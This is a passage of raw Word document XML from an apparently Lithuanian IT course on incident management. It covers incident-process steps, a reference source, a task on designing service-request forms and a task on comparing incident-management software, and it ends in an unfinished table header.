        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDCC60" w14:textId="6073D162" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sprendimas ir atkūrimas</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C566AEB" w14:textId="5634910A" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="780"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Incidento uždarymas</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50B6BA" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157ED311" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D73F051" w14:textId="2218526F" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ITSM Basics: A Simple Introduction to Incident Management (2015, sausio 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sysaid</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId128">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12324CE5" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBC9F05" w14:textId="253A6158" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="10181ACB" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASLAUGŲ UŽKLAUSOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D54A4" w14:textId="7A943F5E" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Sugalvo</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, numaty</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, sumodeliu</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>oti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>galimas paslaugų užklausas. Paslaugų užklausas surašy</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>taip, kad būtų nurodytos ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>svarbios</w:t>
      </w:r>
      <w:r w:rsidR="00C50F00" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C50F00" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aktualios</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jų </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aplinkybė</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714D88B" w14:textId="3179B980" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIS: Sudary</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> anket</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (anket</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) šabloną paslaugų užklausoms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4127B" w14:textId="3EB7E2C0" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PAVYZDYS: </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alimos užklausos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E05C530" w14:textId="3608D3CA" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naujos aparatinės ar programinės įrangos užklausa</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A8760" w14:textId="379BB4F0" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prieigos užklausa programai ar bendram diskui</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D8258C" w14:textId="4FDB1185" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Informacija apie tam tikrą IT paslaugą</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A254420" w14:textId="39E4BDFD" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>„Kaip“ informacija</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vz.</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kaip galiu pasiekti savo el. laiškus būdamas ne biure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3586A" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6553BDB6" w14:textId="637AC634" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00555F01" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> INCIDENTŲ VALDYMO PROGRAMINĖ ĮRANGA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1DBD6" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: Surasti ir sudaryti incidentų valdymo programinių įrangų sąrašą. Įvertinti kainos ir funkcionalumo santykį. Užpildyti lentelę.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="570"/>
        <w:gridCol w:w="2686"/>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="1267"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="129CDF19" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="547B9016" w14:textId="46D049AE" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="004E40EE" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="235372B0" w14:textId="3FA76F0E" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1359" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5363837B" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
